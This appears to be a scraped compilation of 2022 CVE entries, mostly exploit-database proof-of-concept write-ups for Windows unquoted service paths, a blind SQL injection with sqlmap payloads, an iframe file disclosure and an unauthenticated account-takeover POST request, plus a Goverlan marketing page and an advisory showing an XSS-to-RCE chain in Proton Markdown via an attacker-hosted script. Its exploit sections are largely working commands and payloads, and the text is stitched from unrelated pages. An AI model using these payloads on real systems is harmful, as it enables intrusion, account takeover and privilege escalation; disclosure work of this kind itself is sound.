MiniTool Partition Wizard v12.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
    # Date: 07/04/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.minitool.com/
    # Software Link: https://www.minitool.com/download-center/
    # Version: 12.0
    # Tested: Windows 10 Pro x64 es
    
    # PoC :
    
    C:\Users\saudh>sc qc MTSchedulerService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: MTSchedulerService
            TYPE               : 110  WIN32_OWN_PROCESS (interactive)
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : MTSchedulerService
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
    
    C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                               BUILTIN\Administrators:(I)(F)
                                                               BUILTIN\Users:(I)(RX)
    
    Successfully processed 1 files; Failed processing 0 files

CVE-2022-29320: Offensive Security’s Exploit Database Archive

Multi-Vendor Online Groceries Management System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /products/view_product.php.

    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Windows 10
    
    
    # Vulnerable Code
    
    line 2 in file "mvogms/products/view_product.php
    
    $qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
    
    # Sqlmap command:
    
    sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
    
    # Output:
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

CVE-2022-26632: Offensive Security’s Exploit Database Archive

HMA VPN v5.3.5913.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: HMA VPN 5.3 - Unquoted Service Path
    # Date: 18/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.hidemyass.com/
    # Software Link: https://www.hidemyass.com/en-us/downloads
    # Version: 5.3.5913.0
    # Tested: Windows 10 Pro x64 es
    
    
    C:\Users\saudh>sc qc HmaProVpn
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: HmaProVpn
            TYPE               : 20  WIN32_SHARE_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : HMA VPN
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-26634: Offensive Security’s Exploit Database Archive

BattlEye v0.9 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
    # Date: 09/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.battleye.com/
    # Software Link: https://www.battleye.com/downloads/
    # Version: 0.94
    # Tested: Windows 10 Pro 
    # Contact: https://twitter.com/dmaral3noz
    
    
    C:\Users\saudh>sc qc BEService
    
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: BEService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : BattlEye Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27095: Offensive Security’s Exploit Database Archive

Private Internet Access v3.3 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
    # Date: 04/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.privateinternetaccess.com
    # Software Link: https://www.privateinternetaccess.com/download
    # Version: 3.3.0.100
    # Tested: Windows 10 x64
    # Contact: https://twitter.com/dmaral3noz
    
    # Step to discover Unquoted Service Path:
    
    C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname
    
    DisplayName                      Name                          PathName                                                    StartMode  StartName
    Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem
    
    # Service info:
    
    C:\Users\saudh>sc qc PrivateInternetAccessService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: PrivateInternetAccessService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Private Internet Access Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27092: Offensive Security’s Exploit Database Archive

Sony PlayMemories Home v6.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
    # Date: 09/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sony.com/
    # Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
    # Version: 6.0
    # Tested: Windows 10 Pro 
    # Contact: https://twitter.com/dmaral3noz
    
    
    C:\Users\saudh>sc qc PMBDeviceInfoProvider
    
    [SC] QueryServiceConfig SUCCESS
    
    
    SERVICE_NAME: PMBDeviceInfoProvider
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : PMBDeviceInfoProvider
            DEPENDENCIES       : RPCSS
            SERVICE_START_NAME : LocalSystem
    
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27094: Offensive Security’s Exploit Database Archive

Multi Store Inventory Management System v1.0 was discovered to contain an information disclosure vulnerability which allows attackers to access sensitive files.

    # Exploit Title: Multi Store Inventory Management System - Information Disclosure# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :The application allows directory listing and information disclosure ofsome sensitive files that can allow an attacker to leverage the disclosedinformation.################################################PoC Html :<html><head><body><title>Multi Store Inventory Management System - Information Disclosure</title><iframesrc=http://127.0.0.1/multistore_demo/install/sql/install.sql></body></head><html>

CVE-2022-28991: Multi Store Inventory Management System 1.0 Information Disclosure ≈ Packet Storm

Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.

    # Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "email", "password" , "firstname" and "lastname" parameters#Steps to Reproduce :1. Send the below POST request by changing "id", "email", "password" parameters.2. Log in to the user account by changed email and password.################################################POST /multistore_demo/dashboard/home/setting HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687Content-Length: 1645Origin: http://localhostConnection: closeReferer: http://localhost/multistore_demo/dashboard/home/settingCookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405Upgrade-Insecure-Requests: 1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="id"1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="firstname"saud-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="lastname"test-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="email"s3od@hi.com-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="password"admin123-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="about"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="old_image"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="image"; filename=""Content-Type: application/octet-stream-----------------------------246162487211952414471071914687--

CVE-2022-28993: Multi Store Inventory Management System 1.0 Account Takeover ≈ Packet Storm

In certain Goverlan products, the Windows Firewall is temporarily turned off upon a Goverlan agent update operation. This allows remote attackers to bypass firewall blocking rules for a time period of up to 30 seconds. This affects Goverlan Reach Console before 10.5.1, Reach Server before 3.70.1, and Reach Client Agents before 10.1.11.

EasyVista Acquires Goverlan to Expand Product Capabilities Toward Self-Healing

**Discover Goverlan Reach**

with this 3 minute video

**Alleviate your help desk pain points with remote help desk software****Learn how Goverlan Reach  
can improve Software Deployment**

**Goverlan Reach is used for**  

**Goverlan Reach remote IT support software solves your help desk pain points by increasing ticket close rates and overall help desk productivity.**

**Goverlan Reach remote admin software works behind the scenes to instantaneously:**

*   Reset a password
*   Unlock an account
*   Install a driver or device
*   Add a printer
*   Map a drive
*   Install, repair a software
*   Run & end a process
*   Monitor performance

**For your more complicated cases, you can remote control:**

*   Quickly connecting to user sessions with fastConnect
*   Inviting other operators to join a session and collaborate on resolution
*   Learn more

**Manage your desktop users and IT infrastructure remotely and securely. Automate your repetitive system administration tasks.**

**Save time and improve efficiency with:**

*   Global configuration management
*   Real-time monitoring, reporting and process automation
*   Software deployment, patch management and Windows updates
*   Password Management
*   Remote control, SSH and Telnet access
*   Secure access of desktops, servers, switches, and firewalls
*   Active Directory administration and automation
*   Bulk actions performed in 1 click
*   Hardware & Software inventories
*   User’s activities monitoring
*   Learn more

**Manage the complexity of your IT landscape with a scalable remote access software that works both for SMBs and enterprise businesses.**

**Goverlan Reach offers the following benefits:**

*   Lower cost of supporting IT infrastructure
*   Auditing of technician actions
*   Increased ticket close rates and overall technician productivity
*   Support local and remote end-users and systems
*   Increased compliance and security management
*   Perform almost any Windows administration tasks remotely
*   Compliance evaluation & remediation
*   A solution to manage attended and unattended endpoints
*   Affordable enterprise-class Remote Control
*   Learn more

**Improve efficiency of your remote IT support and administration operations. Support stand-alone users, workgroups, and entire Active Directory sites with enterprise-class remote access software.**

**Goverlan Reach offers the following benefits:**

*   Enterprise-class remote management and administration
*   Entire sites and individual endpoints management without VPN
*   On-demand support options for anyone, anywhere
*   Increased ticket close rate and overall technician productivity
*   Scalable pricing
*   Small footprint, easy integration
*   Auditing of technician actions
*   Learn more

**Manage your ATM, POS, and Digital Signage Systems with smarter remote support tools.**

**Goverlan Reach provides:**

*   Remediates DSS fails without exposing the system’s desktop to the public view
*   Enables users to perform visual verifications on multiple screens at once
*   Allows console operators to schedule health measures to prevent future DSS fails
*   Audits systems, detects undesired activities and sends alerts
*   Provides background systems management tools to minimize disruption
*   Generates hardware & software inventories
*   Offers advanced Remote Control features
*   Is secure and Compliant
*   Learn more

**Why Goverlan Reach?****Empowering the global IT environment since 1998. Trusted by 13,000  
customers and managing more than 3 million devices.**

**TRUSTED**

ACROSS EVERY INDUSTRY

**ENSURE SECURITY**

Secure your organization and clients with an on-premises enterprise-class solution, on-premises credential manager, and centralized auditing.

**TAKE CONTROL**

Get instant access to attended and unattended machines, no matter where they are. Features like on-demand remote access, shadowing Citrix and Terminal Services sessions, and performance monitoring help keep you on top of your IT environment.

**DELIVER UNPARALLELED SUPPORT**

A range of powerful remote admin software tools will help you manage remote users in the most secure environment. Multiple connection options allow you to support users regardless of their network location and quickly resolve their issues.

**Secure****Be in total control**

On-premises implementation  
(no external surface of attack)

Enterprise-class authentication

Internal password vault

Centralized controls of client configuration and operator actions

Centralized auditing of operator actions

**Powerful****All the features you need**

Quickly target the problem,  
efficiently resolve issues

Easy-to-use, robust features

Endpoint management  
anywhere in the world

Zero-delay management engine

Install in minutes

**Scalable****Designed for all organization  
types, levels, and sizes**

Subscription based licenses  
/ Pay as you grow

No additional fee  
for internal end points

Minimal infrastructure  
hardware requirements

**IT professionals  Goverlan®**

> Goverlan, unlike other solutions, offers real-time data. I can be remotely viewing a user's desktop before they are finished explaining the problem.

> With Goverlan we've increased our first-call resolution by 95%. In many cases we can also perform tasks in the background with minimal or no interruption to the user.
> 
> Kingdon Capital

> The intuitive layout and design of the GUI makes learning Goverlan a simple task. We were 100% operational the same day we downloaded the trial installation. The only way it would have been easier is if someone was clicking “NEXT” for me.
> 
> Asbury Automotive Group

> The most significant cost savings with Goverlan have been with travel avoidance and staff time. We're now able to remotely administer actions quicker and more efficiently and perform mass software updates with the simple click of a mouse or scheduled job in Goverlan.
> 
> State of South Dakota, BIT

> Using Goverlan, we can troubleshoot at a fraction of the time – and the cost – everything from fixing printer issues right on the task manager, ... to pushing out OS rollouts countrywide, all right from one office.
> 
> Córas Iompair Éireann

> The product is intuitive and just works… Though we rarely have had to contact support, when we have, we have had prompt response and resolution.
> 
> Teltech Communications

See all

Goverlan Reviews on  

Goverlan Reach

Review by User Les L

Found this at a conference and it's been a FANTASTIC tool

Ease of use and completeness of functionality. Love the Reach server. With the Coronavirus changes in people working from home, this gave us the ability to support personal computers.. more

Review by Hunter M

Great Product for HelpDesk!

The easy of patching, running programs, and the integration with multiple ticketing systems more

Review by Jack T

Efficient Computer Management

I like having all the controls I need in one place - and for the integration with Active Directory, it is a lot faster to use Goverlan than using Active Directory directly more

Review by Wade M

GoverLAN Reach

GoverLAN is a great tool I use almost everyday at the office. It provides both an in-depth look at our network and automation tools that allow us to streamline routine IT processes. Their technical support team is fantastic as well more

Review by Derrick E

Great Low Cost Solution for Small, Medium or Large Organization

Love the fact the licensing is not based on end devices, instead on number of technicians using the product. Make for a low cost solution for anyone. Great features and they are always willing try to expand and grow the product. more

CVE-2022-31215: Remote Support Software for Desktop Support & Systems Management

Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an 'ID' that can be used to send websocket requests and achieve RCE.

**Summary**

**Name**

Proton v0.2.0 - XSS To RCE

**Code name**

Lennon

**Product**

Proton Markdown

**Affected versions**

Version 0.2.0

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

**CVSSv3 Base Score**

7.1

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25224

**Description**

Proton **v0.2.1** allows an attacker to create a malicious link inside a markdown file. When the victim clicks the link, the application opens the site in the current frame allowing an attacker to host JavaScript code in the malicious link in order to trigger an XSS attack. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Create a markdown file with the following content.
    
        [Click me!!!](http://192.168.1.67:8002/rce.html)
        
    
2.  Host the rce.html file with the following content on a server controlled by the attacker.
    
         <script>
             require('child_process').exec('calc');
         </script>
        
    
3.  Send the markdown file to the victim. When the victim clicks the markdown link the site will be open inside electron and the JavaScript code will spawn a calculator.
    

**System Information**

*   Version: Proton v0.2.1.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Proton.Setup.0.2.0.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/steventhanna/proton/

**Timeline**

2022-04-29

Vulnerability discovered.

2022-04-29

Vendor contacted.

2022-05-17

Public Disclosure.

Tag

#windows